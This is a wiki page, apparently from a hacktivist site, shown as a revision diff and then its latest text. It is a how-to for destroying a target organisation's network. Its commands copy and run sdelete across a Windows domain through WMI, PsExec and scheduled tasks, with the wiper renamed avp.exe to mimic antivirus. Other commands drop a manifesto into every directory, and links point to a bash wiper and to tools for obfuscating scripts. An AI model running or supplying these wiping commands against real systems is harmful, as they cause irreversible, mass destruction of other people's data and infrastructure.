Chaos and Destruction: Difference between revisions
Jump to navigation
Jump to search
| (22 intermediate revisions by the same user not shown) | |||
| Line 11: | Line 11: | ||
</pre> | </pre> | ||
=== Wiping Windows Domain === | === Wiping Windows Domain === | ||
When it comes time to destroy your targets network as demonstrated by the [https://kolektiva.media/w/twJjCTkvumnugRy61BjD3T | When it comes time to destroy your targets network as demonstrated by the [https://kolektiva.media/w/twJjCTkvumnugRy61BjD3T Hack Back video Guacamaya made] it's best to use [https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete sdelete] as it's a Microsoft developed and signed application removing the need to disable security controls before it's spread and execution. Below we showcase various different methods to weaponize sdelete64.exe application across the network of your target. | ||
==== Method 1 - GPO & Schtasks ==== | |||
Using Group Policy Objects (GPO) and Scheduled tasks to spread sdelete64.exe across a domain | |||
* [https://enlacehacktivista.org/index.php?title=Pronico#Video_Timeline Guacamaya] (2:13:35 Wiping windows domain with [https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete sdelete] on the domain controller) <code>sdelete64.exe -accepteula -r -s C:\*</code> | * [https://enlacehacktivista.org/index.php?title=Pronico#Video_Timeline Guacamaya] (2:13:35 Wiping windows domain with [https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete sdelete] on the domain controller) <code>sdelete64.exe -accepteula -r -s C:\*</code> | ||
==== Method 2 - WMI ==== | |||
[https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak/blob/main/Manual_CS.txt Using batch files to spread] sdelete64.exe utilizing Windows Management Instrumentation (WMI) | |||
On the domain controller get list of server names: | On the domain controller (DC) get a list of server names: | ||
* <code>net view /all /domain</code> | * <code>net view /all /domain</code> | ||
'''Copy''' | '''Copy''' | ||
Running as the domain admin, copy the sdelete64.exe binary file to all servers in your list: | Running as the domain admin, on the domain controller (DC), copy the sdelete64.exe binary file to all servers in your list: | ||
* <code>for /f %%i in (servers.txt) do copy "C:\Windows\Temp\sdelete64.exe" "\\%%i\C$\Windows\avp.exe"</code> | * <code>for /f %%i in (servers.txt) do copy "C:\Windows\Temp\sdelete64.exe" "\\%%i\C$\Windows\avp.exe"</code> | ||
Specify account credentials: | Specify account credentials: | ||
* <code>start wmic /node:"<COMPUTER>" /user:" | * <code>start wmic /node:"<COMPUTER>" /user:"Administrator" /password:"Passw0rd123!" process call create "cmd.exe /c copy \\SHARE\C$\Windows\Temp\sdelete64.exe C:\Windows\avp.exe"</code> | ||
'''Execute''' | '''Execute''' | ||
| Line 35: | Line 37: | ||
Specify account credentials: | Specify account credentials: | ||
* <code>start wmic /node:"<COMPUTER>" /user:" | * <code>start wmic /node:"<COMPUTER>" /user:"Administrator" /password:"Passw0rd123!" process call create "cmd.exe /c C:\Windows\avp.exe -accepteula -r -s C:\*"</code> | ||
==== Method 3 - PsExec ==== | |||
* <code> | Using [https://learn.microsoft.com/en-us/sysinternals/downloads/psexec PsExec] to run sdelete64.exe [https://youtu.be/oMAvSpq9fYY?feature=shared&t=2811 across the network]: | ||
'''Copy:''' | |||
* <code>PsExec.exe -accepteula @C:\Windows\Temp\servers.txt -u DOMAIN\Administrator -p Passw0rd123! cmd /c copy "\\127.0.0.1\C$\Windows\Temp\sdelete64.exe" "C:\Windows"</code> | |||
'''Execute:''' | |||
* <code>start PsExec.exe -d @:\\127.0.0.1\C$\Windows\Temp\servers.txt -u DOMAIN\Administrator -p Passw0rd123! cmd /c C:\Windows\sdelete64.exe -accepteula -r -s C:\*</code> | |||
==== Method 4 - Schtasks ==== | |||
Using [https://learn.microsoft.com/en-us/windows/win32/taskschd/schtasks Windows scheduled tasks] to execute sdelete64.exe on remote systems (also good for lateral movement): | |||
Run as domain admin: | |||
* <code>schtasks /s <COMPUTER> /create /tn wipe /tr C:\Windows\avp.exe -accepteula -r -s C:\* /ru SYSTEM /sc once /st 00:00</code> | |||
* <code>schtasks /s <COMPUTER> /run /tn wipe</code> | |||
Specify credentials: | |||
* <code>schtasks /s <COMPUTER> /u Administrator /p Passw0rd123! /Create /tn wipe /tr C:\Windows\avp.exe -accepteula -r -s C:\* /ru SYSTEM /sc once /st 00:00</code> | |||
* <code>schtasks /s <COMPUTER> /u Administrator /p Passw0rd123! /run /tn wipe</code> | |||
=== Encrypt Windows Domain === | === Encrypt Windows Domain === | ||
| Line 48: | Line 68: | ||
* <code>find ~/ -type d -exec cp -R /tmp/manifesto.txt {} \;</code> | * <code>find ~/ -type d -exec cp -R /tmp/manifesto.txt {} \;</code> | ||
=== Wiping Linux System === | === Wiping Linux System === | ||
After you have identified all of your targets internal Linux servers and are able to access them, you can utilize a [https://0xjet.github.io/3OHA/2022/12/18/post.html bash wiper] to destroy those servers whilst sdelete64.exe is destroying the Windows systems. | |||
* https://web.archive.org/web/20230724204753/https://pastebin.com/raw/1LcPihYr ([https://github.com/0xjet/bash-malware/blob/main/AWFULSHRED/AWFULSHRED_beautified.zip source]) | * Bash Wiper: https://web.archive.org/web/20230724204753/https://pastebin.com/raw/1LcPihYr ([https://github.com/0xjet/bash-malware/blob/main/AWFULSHRED/AWFULSHRED_beautified.zip source]) | ||
** A Node.js CLI tool and library to heavily obfuscate bash scripts: https://www.npmjs.com/package/bash-obfuscate | ** A Node.js CLI tool and library to heavily obfuscate bash scripts: https://www.npmjs.com/package/bash-obfuscate | ||
** Shell script compiler: https://packages.debian.org/bullseye/shc | ** Shell script compiler: https://packages.debian.org/bullseye/shc | ||
Latest revision as of 17:54, 25 March 2024
Companies have large networks consisting of both Windows and Linux systems, so if your end goal is not only leaking data to journalists but to also destroy your target then using a wiper will be the best way to achieve this goal, just make sure not to wipe critical services that may impact someones physical safety as demonstrated in Guacamaya's HackBack video, we want to destroy data, not harm human life.
Windows
Print your manifesto
@echo off
set "manifesto=C:\Users\Administrator\AppData\Local\Temp\manifesto.txt"
for /r "C:\" %%d in (.) do (
xcopy "%manifesto%" "%%d\" /Y
)
Wiping Windows Domain
When it comes time to destroy your targets network as demonstrated by the Hack Back video Guacamaya made it's best to use sdelete as it's a Microsoft developed and signed application removing the need to disable security controls before it's spread and execution. Below we showcase various different methods to weaponize sdelete64.exe application across the network of your target.
Method 1 - GPO & Schtasks
Using Group Policy Objects (GPO) and Scheduled tasks to spread sdelete64.exe across a domain
- Guacamaya (2:13:35 Wiping windows domain with sdelete on the domain controller)
sdelete64.exe -accepteula -r -s C:\*
Method 2 - WMI
Using batch files to spread sdelete64.exe utilizing Windows Management Instrumentation (WMI)
On the domain controller (DC) get a list of server names:
net view /all /domain
Copy
Running as the domain admin, on the domain controller (DC), copy the sdelete64.exe binary file to all servers in your list:
for /f %%i in (servers.txt) do copy "C:\Windows\Temp\sdelete64.exe" "\\%%i\C$\Windows\avp.exe"
Specify account credentials:
start wmic /node:"<COMPUTER>" /user:"Administrator" /password:"Passw0rd123!" process call create "cmd.exe /c copy \\SHARE\C$\Windows\Temp\sdelete64.exe C:\Windows\avp.exe"
Execute
Running as the domain admin now execute:
for /f %%i in (servers.txt) do wmic /node:%%i process call create "cmd.exe /c C:\Windows\avp.exe -accepteula -r -s C:\*"
Specify account credentials:
start wmic /node:"<COMPUTER>" /user:"Administrator" /password:"Passw0rd123!" process call create "cmd.exe /c C:\Windows\avp.exe -accepteula -r -s C:\*"
Method 3 - PsExec
Using PsExec to run sdelete64.exe across the network:
Copy:
PsExec.exe -accepteula @C:\Windows\Temp\servers.txt -u DOMAIN\Administrator -p Passw0rd123! cmd /c copy "\\127.0.0.1\C$\Windows\Temp\sdelete64.exe" "C:\Windows"
Execute:
start PsExec.exe -d @:\\127.0.0.1\C$\Windows\Temp\servers.txt -u DOMAIN\Administrator -p Passw0rd123! cmd /c C:\Windows\sdelete64.exe -accepteula -r -s C:\*
Method 4 - Schtasks
Using Windows scheduled tasks to execute sdelete64.exe on remote systems (also good for lateral movement):
Run as domain admin:
schtasks /s <COMPUTER> /create /tn wipe /tr C:\Windows\avp.exe -accepteula -r -s C:\* /ru SYSTEM /sc once /st 00:00schtasks /s <COMPUTER> /run /tn wipe
Specify credentials:
schtasks /s <COMPUTER> /u Administrator /p Passw0rd123! /Create /tn wipe /tr C:\Windows\avp.exe -accepteula -r -s C:\* /ru SYSTEM /sc once /st 00:00schtasks /s <COMPUTER> /u Administrator /p Passw0rd123! /run /tn wipe
Encrypt Windows Domain
Encrypt Windows Domain (1:24:16 Wiping windows domain with Bitlocker)
Linux
Print your manifesto
find ~/ -type d -exec cp -R /tmp/manifesto.txt {} \;
Wiping Linux System
After you have identified all of your targets internal Linux servers and are able to access them, you can utilize a bash wiper to destroy those servers whilst sdelete64.exe is destroying the Windows systems.
- Bash Wiper: https://web.archive.org/web/20230724204753/https://pastebin.com/raw/1LcPihYr (source)
- A Node.js CLI tool and library to heavily obfuscate bash scripts: https://www.npmjs.com/package/bash-obfuscate
- Shell script compiler: https://packages.debian.org/bullseye/shc